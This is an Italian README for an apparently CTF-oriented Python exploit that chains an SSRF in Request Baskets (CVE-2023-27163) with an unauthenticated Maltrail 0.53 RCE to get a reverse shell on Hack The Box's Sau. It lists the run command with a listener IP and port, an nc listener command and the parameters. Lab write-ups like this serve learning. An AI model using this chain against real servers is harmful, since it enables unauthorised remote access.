
Catena di exploit automatizzata per HTB Sau — CVE-2023-27163 (SSRF) + Maltrail Unauthenticated RCE → Reverse Shell
Uno script di exploit in Python che combina CVE-2023-27163 (Server-Side Request Forgery in Request Baskets ≤ 1.2.1) con una vulnerabilità di esecuzione remota di codice non autenticata in Maltrail 0.53, fornendo una reverse shell. Progettato per la macchina Hack The Box Sau.
Questo script automatizza il percorso di exploit necessario per ottenere l'accesso iniziale sul target:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
Esempio:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
Prima di eseguire l'exploit, avvia un listener sulla tua macchina per ricevere la reverse shell:
nc -lvnp <LISTENER_PORT>
Esempio:
nc -lvnp 4444
| Parametro | Descrizione |
|---|---|
TARGET_URL | URL di base del target (es. http://IP) |
LISTENER_IP | L'IP della tua macchina attaccante |
LISTENER_PORT | Porta per ricevere la reverse shell |
bucket_url)/ finale dall'URL del target (gestito automaticamente nello script)Questo progetto è destinato a scopi educativi e all'uso in ambienti autorizzati come Hack The Box. Non utilizzarlo contro sistemi senza la dovuta autorizzazione.